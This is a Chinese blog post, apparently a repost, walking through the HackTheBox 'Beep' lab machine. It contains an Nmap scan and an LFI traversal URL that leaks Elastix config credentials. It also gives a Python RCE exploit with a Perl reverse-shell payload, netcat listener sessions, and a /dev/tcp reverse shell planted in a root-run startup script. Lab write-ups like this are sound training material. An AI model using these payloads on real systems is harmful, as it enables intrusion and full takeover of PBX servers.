小言_互联网的博客

实战HackTheBox里面的Beep

299人阅读  评论(0)

与之前一样,第一步是运行Nmap扫描以识别正在运行的信息。

# Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) PIPELINING AUTH-RESP-CODE USER STLS UIDL APOP EXPIRE(NEVER) TOP
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: CONDSTORE CATENATE ACL CHILDREN OK URLAUTHA0001 X-NETSCAPE LITERAL+ LIST-SUBSCRIBED LISTEXT IDLE MULTIAPPEND MAILBOX-REFERRALS QUOTA NAMESPACE UIDPLUS Completed ID ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte THREAD=ORDEREDSUBJECT SORT SORT=MODSEQ IMAP4 RENAME UNSELECT NO BINARY IMAP4rev1 ATOMIC STARTTLS
443/tcp   open  ssl/https?
|_ssl-date: 2020-08-23T10:30:15+00:00; +2m01s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/23%OT=22%CT=1%CU=43276%PV=Y%DS=2%DC=I%G=Y%TM=5F42455
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 2m00s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 23 06:30:49 2020 -- 1 IP address (1 host up) scanned in 384.20 seconds

从这里我们可以看到盒子上运行着许多服务。最值得注意的是SQL服务器,邮件服务器和PBX。我从浏览端口80开始,发现Elastix服务器软件正在运行。我尝试使用默认凭据登录,但未成功。

我做了一些Elastix的漏洞利用搜索。从登录页面很难判断哪个软件版本正在运行,所以很多都是反复试验。我发现这里有LFI漏洞利用程序,可让你查看amportal.conf配置文件。该文件包括elastix Web界面的纯文本凭据。可以通过以下链接进行浏览:

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=…/…/…/…/…/…/…/…/etc/amportal.conf%00&module=Accounts&action

在此文件中,你具有以下文本块,其中包括用于登录到Elastix Web界面的登录凭据。

AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
vtigerCRM
adminL:jEhdIekWmdjE

接下来,我发现了这个利用利用callme_page.php页面中的$ to参数提供远程代码执行的漏洞。默认情况下,由于登录页面上的证书错误,此代码将不起作用。必须对其稍加修改以纠正此问题,同时还要修改lhost和rhost值。我还必须通过编辑/etc/ssl/openssl.conf接受TLSv1来降低Kali机器上的最低SSL版本。我还需要修改分机号以使其与Beep机器上的分机号匹配。可以通过登录Elastix Web界面,打开PBX选项卡并找到扩展名为233的用户名Fanis Papafanopoulos来收集这些信息。该漏洞利用代码最终如下所示:

import urllib
rhost="10.10.10.7"
lhost="10.10.14.29"
lport=443
extension="233"
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)

然后,我在端口443上启动了一个netcat侦听器,运行了漏洞利用程序,并在侦听器上成功接收了shell。我使用python升级了shell,使之更加可行,然后能够浏览到fanis用户并捕获用户标志。

kali@kali:/etc/ssl$ sudo nc -lvp 443
listening on [any] 443 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.7] 59571
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ whoami
whoami
asterisk
bash-3.2$ cd /home
cd /home
bash-3.2$ ls
ls
fanis  spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
user.txt
bash-3.2$ cat user.txt
cat user.txt
[REDACTED]
bash-3.2$

接下来,我们必须将特权升级为root用户。我运行“ ps aux”以查找当前正在运行的程序。以下程序以root用户身份运行时引起了我的注意,但是该文件属于并具有星号用户的写许可权。这使我可以修改文件,然后使其以root身份运行以生成根反向shell。

root      3571  0.0  0.1   4636  1168 ?        S    21:06   0:00 /bin/bash /etc/rc3.d/S91elastix-updaterd start

我首先使用以下反向shell修改了文件:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.29/2600 0>&1

然后,我在kali机器的端口2600上启动了一个netcat侦听器:

kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...

然后,我需要找到一种方法来启动elastix-updaterd进程。经过一番尝试和错误后,我发现通过elastix界面重新启动系统导致elastix-updaterd脚本以root用户身份运行。

重新启动完成后,在netcat侦听器上显示了一个shell。从这里,我确定它是一个根外壳,然后能够放置根标志。

kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.7] 47950
bash: no job control in this shell                                                                                   
bash-3.2# whoami                                                                                                  
root                                                                                                              
bash-3.2# cd /root                                                                                                
bash-3.2# ls
anaconda-ks.cfg
elastix-pr-2.2-1.i386.rpm
install.log
install.log.syslog
postnochroot
root.txt
webmin-1.570-1.noarch.rpm
bash-3.2# cat root.txt
[REDACTED]
bash-3.2#

关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者


转载:https://blog.csdn.net/qq_25879801/article/details/112488267
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场